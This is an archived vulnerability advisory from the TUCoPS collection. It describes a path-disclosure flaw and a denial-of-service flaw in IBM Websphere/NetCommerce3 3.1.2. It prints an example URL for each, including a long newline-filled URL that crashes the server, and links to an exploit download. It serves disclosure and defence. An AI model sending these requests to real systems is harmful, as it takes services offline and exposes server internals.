TUCoPS :: Web :: Servers :: wspher01.htm

IBM Websphere/NetCommerce3 3.1.2 DoS and show-path vulnerabilities 
Vulnerability

    IBM Websphere/NetCommerce3

Affected

    IBM Websphere/NetCommerce3 3.1.2

Description

    ET LoWNOISE posted following.  Path revealing problem:

        http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK

    Result:

        DTWP029E: Net.Data is unable to locate the HTML block NOEXISTINGHTMLBLOCK
         in file /usr/NetCommerce3/macros/en_US/macro.d2w

    DoS with Long URL:

        http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(aprox 1000)..%0a

    On UNIX and NT Netcommerce will crash: Server Not Responding.

    Tamer Sahin wrote (ms based) exploit code for this hole:

        http://www.tamersahin.net/contents/nc-dos.zip

Solution

    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH